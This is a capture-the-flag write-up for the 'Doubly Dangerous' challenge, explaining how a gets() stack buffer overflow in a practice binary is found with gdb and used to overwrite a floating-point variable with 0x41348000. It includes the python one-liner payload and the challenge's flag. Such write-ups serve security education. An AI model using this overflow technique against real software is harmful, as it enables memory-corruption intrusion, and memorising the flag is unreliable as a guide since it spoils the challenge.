Skip to content

Latest commit

 

History

History
74 lines (54 loc) · 2.54 KB

doubly-dangerous-110-points.md

File metadata and controls

74 lines (54 loc) · 2.54 KB

Doubly Dangerous - 110 Points

There seems to be an issue with this binary. Can you exploit it?

Solution

Writeup by VoidMercy from phsst

We were given a binary.

We first run it to see what it does

Give me a string: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
nope!
Segmentation fault

Seems like a buffer overflow because there was a segmentation fault. This means gets() was probably used, and gets() does not care about the length of the string we input. Now let's take a look at the code in gdb with

gdb doubly_dangerous
set disassembly-flavor intel
disas main

Here is the interesting instruction:

0x0804863c <+53>:    fld    DWORD PTR [ebp-0xc]
0x0804863f <+56>:    fld    DWORD PTR ds:0x804876c
0x08048645 <+62>:    fucomip st,st(1)

We can see that fucomip is being used, which is floating point instructions. We surmise that we need to make this compare return true. We can see that the value at 0x804876c is being compared to the value at ebp-0xc. Because we saw a segmentation fault, we know this consists of an overflow. We experiment with the amount of bytes to type until the value at ebp-0xc is overflowed.

python -c "print 'A'*69" > temp

(gdb) r < temp
...
Breakpoint 1, 0x08048686 in main ()
(gdb) x/10wx $ebp-0xc
0xffffd0dc:     0x41414141      0xf7fc0041      0xffffd100      0x00000000
0xffffd0ec:     0xf7e31a83      0x08048690      0x00000000      0x00000000
0xffffd0fc:     0xf7e31a83      0x00000001

Alright, we can see that 69 characters overflows the content at ebp-0xc and 1 extra character. This means we need 64 characters to get the ebp-0xc, and then with the next four characters, we can control what value to place in $ebp-0xc. Now, we need to check what value to replace it with.

(gdb) x/10wx 0x804876c
0x804876c:      0x41348000      0x3b031b01      0x00000030      0x00000005
0x804877c:      0xfffffc60      0x0000004c      0xfffffe0b      0x00000070
0x804878c:      0xfffffe97      0x00000090

We can see the value we need is 0x41348000. Now we can construct our exploit.

python -c "print 'A'*64 + '\x00\x80\x34\x41'" | ./doubly_dangerous

python -c "print 'A'*64 + '\x00\x80\x34\x41'" | ./doubly_dangerous
Give me a string: 
Success! Here is your flag:
easyctf{bofs_and_floats_are_d0uble_tr0uble!}

Flag

easyctf{bofs_and_floats_are_d0uble_tr0uble!}